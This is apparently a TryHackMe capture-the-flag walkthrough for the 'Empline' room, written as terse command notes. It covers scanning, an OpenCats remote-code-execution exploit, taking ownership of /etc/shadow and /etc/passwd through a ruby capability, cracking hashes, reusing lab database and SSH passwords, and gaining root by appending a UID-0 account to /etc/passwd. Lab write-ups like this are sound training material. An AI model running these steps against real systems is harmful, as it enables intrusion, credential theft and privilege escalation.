Empline
Room Link: https://tryhackme.com/room/empline
Scans
Initial scan
Kali
nmap -A $VICTIM
Longer scan
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/80 - HTTP
Kali
gobuster dir --url http://$VICTIM/ -w /usr/share/dirb/wordlists/big.txt -l


Kali
echo "$VICTIM job.empline.thm" >> /etc/hosts
Initial Shell
OpenCats 0.9.4 has a RCE exploit.
Exploit: https://www.exploit-db.com/raw/50585
Kali
chmod +x exploit.sh 
./exploit.sh 
./exploit.sh http://job.empline.thm/
Victim
getcap -r / 2>/dev/null
Victim
ls -lah /etc/shadow
ruby -e 'require "fileutils"; FileUtils.chown("www-data", "www-data", "/etc/shadow")'
ls -lah /etc/shadow

Victim
Now that we can read both f these files we can transfer them to Kali. I let this run for a while but it wasn't cracking any hashes.
cat /etc/passwd
cat /etc/shadowKali
unshadow passwd shadow > passwords.txtKali
john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txtI went back to the check the box and found the database credentials
Victim
find / -name "config.php"
cat /var/www/opencats/config.php 

Kali
mysql -h $VICTIM -u james -png6pUFvsGNtw  Kali(mysql)
show databases;
use opencats
show tables;  
select * from user;  There were a few hashes from users so I put them in crackstation and one returned a result.

TCP/22 - SSH
Kali
ssh george@$VICTIM
Password: pretonnevippasemprePrivilege Escalation
Since I had access to change any file already I just added a new root user to passwd
Victim
ruby -e 'require "fileutils"; FileUtils.chown("george", "george", "/etc/passwd")'
echo 'new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash' >> /etc/passwd
su new
Password: 123
Last updated